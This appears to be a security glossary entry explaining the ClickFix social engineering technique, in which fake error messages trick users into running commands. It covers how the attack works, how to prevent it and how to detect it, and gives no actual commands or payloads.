ClickFix
ClickFixClickFix is a social engineering technique that tricks users into executing malicious commands or actions by pretending to offer a fix for a technical problem.
What is ClickFix?
ClickFix is a social engineering attack technique in which attackers persuade users to manually execute malicious actions - such as copying and pasting commands, running scripts, or installing tools - under the guise of fixing an error or security issue.
Unlike traditional malware delivery, ClickFix often bypasses automatic security controls by relying on user interaction.
Why ClickFix matters
ClickFix is dangerous because it:
- Exploits user trust and urgency
- Bypasses email and endpoint protections
- Requires no exploit or vulnerability
- Works across operating systems
- Is difficult to block with traditional defenses
It has become increasingly common in targeted and opportunistic attacks.
How a ClickFix attack works
A typical ClickFix attack follows this pattern:
- The victim encounters a fake error or warning (website, email, pop-up)
- The message claims a fix is required (browser issue, security alert, update)
- Instructions tell the user to copy/paste or run a command
- The user executes the command manually
- Malware is installed or access is granted
The "fix" is actually the attack vector.
Common ClickFix scenarios
ClickFix is frequently used in:
- Fake browser error pages
- Malicious SEO or compromised websites
- Fake CAPTCHA or verification steps
- Email or chat-based "IT support" scams
- Cloud or Microsoft-style warning pages
Commands may target PowerShell, Bash, Terminal, or Run dialogs.
ClickFix vs traditional malware delivery
| Aspect | ClickFix | Traditional malware |
|---|---|---|
| Exploit required | No | Often |
| User interaction | Mandatory | Optional |
| AV detection | Lower | Higher |
| Technique | Social engineering | Technical exploitation |
| Visibility | High deception | Often hidden |
ClickFix relies on human execution, not software flaws.
Malware delivered via ClickFix
ClickFix campaigns commonly deploy:
- Info-stealers
- Remote access trojans (RATs)
- Loaders and droppers
- Ransomware precursors
- Persistence scripts
The initial payload is often small but enables follow-on attacks.
Why ClickFix is effective
ClickFix succeeds because:
- Users trust instructions that look technical
- The action feels "legitimate"
- The user believes they initiated the fix
- Security tools may not block manual actions
- Contextual pressure creates urgency
It exploits human behavior rather than system weaknesses.
Preventing ClickFix attacks
Effective defenses include:
- User awareness and training
- Blocking copy/paste execution instructions
- Restricting script execution where possible
- Application control and least privilege
- Browser isolation and URL filtering
- Monitoring suspicious command execution
Education is as important as technical controls.
Detection considerations
Security teams may detect ClickFix via:
- Unusual command-line activity
- User-initiated script execution
- PowerShell or shell abuse
- Endpoint behavior anomalies
- Correlation with phishing or malicious URLs
ClickFix often appears benign at first glance.
Common misconceptions
- "If the user runs it, it's not malware"
- "Antivirus will always stop this"
- "Only non-technical users fall for ClickFix"
- "ClickFix is just phishing"